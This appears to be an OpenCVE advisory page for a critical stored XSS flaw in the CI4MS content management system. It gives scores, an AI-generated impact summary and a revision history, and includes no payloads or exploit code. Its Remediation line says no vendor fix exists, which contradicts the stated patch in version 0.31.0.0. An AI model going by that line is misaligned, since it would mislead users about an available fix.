Description
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within the Methods Management functionality when creating or managing application methods/pages. Multiple input fields accept attacker-controlled JavaScript payloads that are stored server-side without sanitization or output encoding. These stored values are later rendered directly into administrative interfaces and global navigation components without proper encoding, resulting in Stored DOM-Based Cross-Site Scripting (XSS). This issue has been patched in version 0.31.0.0.
Published: 2026-03-30
Score: 9.1 Critical
EPSS: < 1% Very Low
KEV: No
Impact: Account Takeover
Action: Patch Now
AI Analysis

Impact

This vulnerability occurs when user-controlled input in the Methods Management feature of CI4MS is stored without proper sanitation. The attacker can inject JavaScript that is later rendered in administrative and navigation pages, resulting in stored DOM-based XSS. Exploitation allows an attacker to run code in the browser of any administrator, enabling cookie theft, credential compromise, and full account takeover for all roles, as well as arbitrary privilege escalation.

Affected Systems

Versions of CI4MS before 0.31.0.0, including 0.30.x and earlier, are affected. The product is the CodeIgniter 4-based CMS skeleton provided by ci4-cms-erp under the product name ci4ms.

Risk and Exploitability

The CVSS score of 9.1 indicates critical severity, but the EPSS score of less than 1% suggests low likelihood of exploitation in the wild. The vulnerability is not listed in CISA’s KEV catalog. The likely attack vector is an attacker exploiting the administrative interface to inject malicious scripts, which then execute in the browsers of other administrators interpreting the stored data.

Generated by OpenCVE AI on April 6, 2026 at 19:48 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade CI4MS to version 0.31.0.0 or later.

Generated by OpenCVE AI on April 6, 2026 at 19:48 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
Github GHSA Github GHSA GHSA-v77r-xg3p-75g7 CI4MS: Methods Management Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS
History

Mon, 06 Apr 2026 16:45:00 +0000

Type Values Removed Values Added
CPEs cpe:2.3:a:ci4-cms-erp:ci4ms:*:*:*:*:*:*:*:*

Wed, 01 Apr 2026 02:15:00 +0000

Type Values Removed Values Added
First Time appeared Ci4-cms-erp
Ci4-cms-erp ci4ms
Vendors & Products Ci4-cms-erp
Ci4-cms-erp ci4ms

Tue, 31 Mar 2026 16:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Tue, 31 Mar 2026 03:00:00 +0000

Type Values Removed Values Added
Description CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within the Methods Management functionality when creating or managing application methods/pages. Multiple input fields accept attacker-controlled JavaScript payloads that are stored server-side without sanitization or output encoding. These stored values are later rendered directly into administrative interfaces and global navigation components without proper encoding, resulting in Stored DOM-Based Cross-Site Scripting (XSS). This issue has been patched in version 0.31.0.0.
Title CI4MS: Methods Management Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 9.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L'}

Subscriptions

Ci4-cms-erp Ci4ms
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-03-31T15:25:20.115Z

Reserved: 2026-03-30T16:31:39.265Z

Link: CVE-2026-34558

cve-icon Vulnrichment

Updated: 2026-03-31T15:25:16.390Z

cve-icon NVD

Status : Analyzed

Published: 2026-03-30T21:17:10.493

Modified: 2026-04-06T16:10:04.077

Link: CVE-2026-34558

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-07T08:08:30Z

Weaknesses